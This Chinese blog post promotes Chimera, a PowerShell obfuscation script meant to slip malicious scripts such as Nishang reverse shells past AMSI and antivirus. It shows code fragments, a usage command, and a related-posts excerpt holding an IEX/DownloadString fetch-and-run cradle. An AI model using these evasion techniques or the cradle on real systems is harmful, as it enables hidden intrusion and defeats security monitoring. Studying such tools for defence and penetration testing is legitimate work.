探秘Chimera:绕过安全防护的PowerShell代码混淆利器

最新推荐文章于 2024-06-04 09:56:06 发布
最新推荐文章于 2024-06-04 09:56:06 发布
阅读量380 收藏 7
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00031/article/details/138841130
版权

探秘Chimera:绕过安全防护的PowerShell代码混淆利器

Chimera演示

在网络安全的世界里,总有那么一些工具,它们的存在既是对安全挑战的回应,也是对技术创新的致敬。Chimera就是这样一款工具,它是一款专门设计用来绕过AMSI(Antivirus Message Signaling Interface)和杀毒软件的PowerShell代码混淆脚本。通过字符串替换和变量拼接等手段,Chimera让恶意的PowerShell脚本能够躲过常规检测,从而在看似无害的环境中悄然运行。

Chimera的工作原理

Chimera的核心功能在于将容易触发安全报警的代码进行拆分和重构造。比如下面这段出自Nishang库中的代码,原本会被25个不同的反病毒引擎识别:

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
...

经过Chimera处理后,这段代码变得难以辨识,同时也能逃过VirusTotal的检测:

  $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
  ...

Chimera利用transformer函数,将常见关键字和数据类型分割成多个部分,并组合成新的变量,增加了静态分析的难度。

应用场景与优势

Chimera适用于任何需要隐藏PowerShell活动的情景,如渗透测试、隐私保护或恶意软件开发。它的核心价值在于:

  1. 对抗AMSI:Chimera的设计目标是规避AMSI,这是Windows系统内置的一种安全机制。
  2. 混淆代码:通过复杂的方式重组代码,使其更难被传统防病毒软件识别。
  3. 灵活性:允许调整混淆级别,以适应不同环境的需求。
  4. 兼容性:已成功应用于多个Nishang脚本,且可以处理未测试的自定义脚本。

使用方法

要使用Chimera,你需要先克隆项目仓库,然后按照提供的说明进行操作。基本的命令行使用示例如下:

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,...

shells/目录中,包含了多种预设的PowerShell脚本,供你进行实验和定制。

结论

Chimera不仅是一个强大的技术展示,也提供了一种思考如何应对日益复杂的网络威胁的新视角。虽然其主要用途可能与灰色地带相关,但理解这种技术同样有助于提升安全防御策略。对于技术爱好者和安全研究人员而言,Chimera无疑是一个值得探索的开源项目。

参考资源:

廉欣盼Industrious
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
powershell代码混淆绕过
weixin_41082546的博客
06-21 1479
目前大多数攻击者已经将PowerShell 利用在了各种攻击场景中,如内网渗透,APT攻击甚至包括现在流行的勒索软件中。powershell的功能强大且调用方式十分灵活。 1. cmd启动powershell 首先看看powershel使用cmd.exe启动执行代码的方式: 1.1 常规方法 cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green" cmd.exe /c "echo Write-Host SUCCESS -Fore G.
powershell命令语句混淆免杀(bypass火绒)
weixin_43899495的博客
02-04 1250
基础混淆 原始语句(不免杀) powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)" AV:火绒 混淆测试 New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀) powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 709
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
论文解读 --- 《针对PowerShell脚本的有效轻量级去混淆和语义感知攻击检测》
罗斯839的博客
04-15 1504
一种有效的混淆代码还原方法
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1686
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
探索Vue Chimera:新一代的RESTful客户端库
gitblog_00029的博客
06-04 322
探索Vue Chimera:新一代的RESTful客户端库 项目地址:https://gitcode.com/chimera-js/vue-chimera 在Web开发的世界里,高效且易于使用的工具始终是开发者的需求。今天,让我们一起深入了解一下Vue Chimera,一个基于Vue.js 2.x和axios构建的高效RESTful客户端库。Vue Chimera将数据管理提升到新的水平,提供了诸...
chameleon:PowerShell 脚本混淆
08-04
Chameleon 是另一种 PowerShell 混淆工具,旨在绕过 AMSI 和商业防病毒解决方案。 该工具已由开发为项目的 Python 端口。 因此,它使用大部分相同的技术来规避常见的检测特征,例如: 评论删除/替换 字符串替换...
ChimeraChimera是一个(闪闪发亮且非常容易破解的)PowerShell模糊处理脚本,旨在绕过AMSI和商业防病毒解决方案
02-05
ChimeraChimera是一个(闪闪发亮且非常容易破解的)PowerShell模糊处理脚本,旨在绕过AMSI和商业防病毒解决方案
二分法代码matlab例题-chimeRa:用R创建听觉嵌合体
06-18
二分法代码matlab示例题奇美拉 这个包是 Chimera Toolbox (Smith, Delgutte & Oxenham, 2002) 的翻译,最初是为 MATLAB 编写的。 它允许用户通过将一个信号的包络与另一个信号的精细时间结构交叉来创建听觉嵌合体。 ...
chimera:Chimera-天文台自动化系统
04-29
Chimera:天文台自动化系统 Chimera是用于控制天文台的软件包,旨在以简单的方式创建远程甚至自治(“机器人”)天文台。 使用Chimera,您可以以非常集成的方式轻松地控制望远镜,CCD相机,聚焦器和快球。 嵌合体是...
matlab建立汽车模型代码-chimera:ChimeraUGEM:无监督基因表达建模和工程平台
06-08
matlab建立汽车模型代码嵌合体 无监督基因表达建模 这个 repo 反映了 . 如何引用 迪亚门特等人。 ChimeraUGEM:任何给定生物体中的无监督基因表达模型。 生物信息学,2019。 执照 ChimeraUGEM 二进制文件和源代码...
Powershell绕过执行及脚本混淆
hl1293348082的专栏
03-28 1224
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。 Windows Server 的 Shell,也就是从 Dos 继承过来的命令行,处理简单问题尚可,一旦遇到稍微复杂一点的问题,它就会把本已复杂的问题,弄得更加复杂。 引入 VBScript,使得 WindowsServer 管理员处理问题的效率提高了不少。但 VBScript 是个脚本语言,即缺乏 Shell 的简单性,也不能.
GEE数据集-高分辨率全球树冠高度地图(1 米)Meta 公司.pdf
07-17
绘制植被结构图对于了解全球碳循环以及监测基于自然的气候适应和减缓方法至关重要。通过对这些数据的重复测量,可以观察现有森林的砍伐或退化情况、森林的自然再生以及农林业等可持续农业实践的实施情况。高空间分辨率的树冠高度和树冠投影面积评估对于监测碳通量和评估基于树木的土地利用也很重要,因为森林结构在空间上可能高度异质,特别是在农林系统中。极高分辨率的卫星图像(地面采样距离小于一米)使提取树木层面的信息成为可能,同时还能进行大尺度监测。本文介绍了第一份同时为多个次国家辖区制作的高分辨率树冠高度图。具体来说,我们为加利福尼亚州和圣保罗州制作了非常高分辨率的树冠高度地图,与之前基于哨兵/GEDI 的全球树冠高度地图的十米(10 米)分辨率相比,分辨率有了显著提高。这些地图是通过在 2017 年至 2020 年的 Maxar 图像上训练的自监督模型中提取特征,并根据航空激光雷达地图训练密集预测解码器生成的。我们还引入了一个后处理步骤,使用在 GEDI 观测数据上训练的卷积网络。我们利用预留验证激光雷达数据以及与其他遥感地图和实地收集的数据进行比较,对所提出的地图进行了评估,发现我们的模型产生的平均绝对
Matlab下载安装、仿真实验方法.docx
07-17
通过以上步骤,你可以完成Matlab的安装、仿真实验的进行以及撰写详细的实验报告。这些步骤将帮助你建立一个清晰、系统的仿真实验流程。
遗传算法及其MATLAB实现
07-17
遗传算法(Genetic Algorithm, GA)最先是由美国Mic- hgan大学的John Holland于1975年提出的。遗传算法是 模拟达尔文的遗传选择和自然淘汰的生物进化过程的计算 模型。它的思想源于生物遗传学和适者生存的自然规律, 是具有“生存+检测”的迭代过程的搜索算法。遗传算法 以一种群体中的所有个体为对象,并利用随机化技术指 导对一个被编码的参数空间进行高效搜索。其中,选择、 交叉和变异构成了遗传算法的遗传操作;参数编码、初始 群体的设定、适应度函数的设计、遗传操作设计、控制参 数设定等5个要素组成了遗传算法的核心内容。 下面是遗传算法的基本步骤以及基本程序流程简介附带有实现程序,可供参考与加深学习。
TI TMS570光盘HERCUle 安全MCU控制器
最新发布
07-17
TI TMS570光盘HERCUle 安全MCU控制器 开发板全套资料 百度网盘下载链接见附件,资源1.43G
成都信息工程大学,考研复试专业课(所有专业都有),历年真题及答案、备考资料题库、高分笔记教程.pdf
07-17
成都信息工程大学,考研复试专业课(所有专业都有),历年真题及答案、备考资料题库、高分笔记教程.pdf
Chimera-Presentation_Xena-Networks.pdf
10-10
Chimera-100G网络损伤模拟仪-产品简介 支持10/25/40/50/100GE多速率,满足丢包延迟抖动等多种损伤模型,每端口提供8-Flow的损伤规则匹配,精准追踪指定流量施加损伤,满足微秒级的高精度测试要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廉欣盼Industrious

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值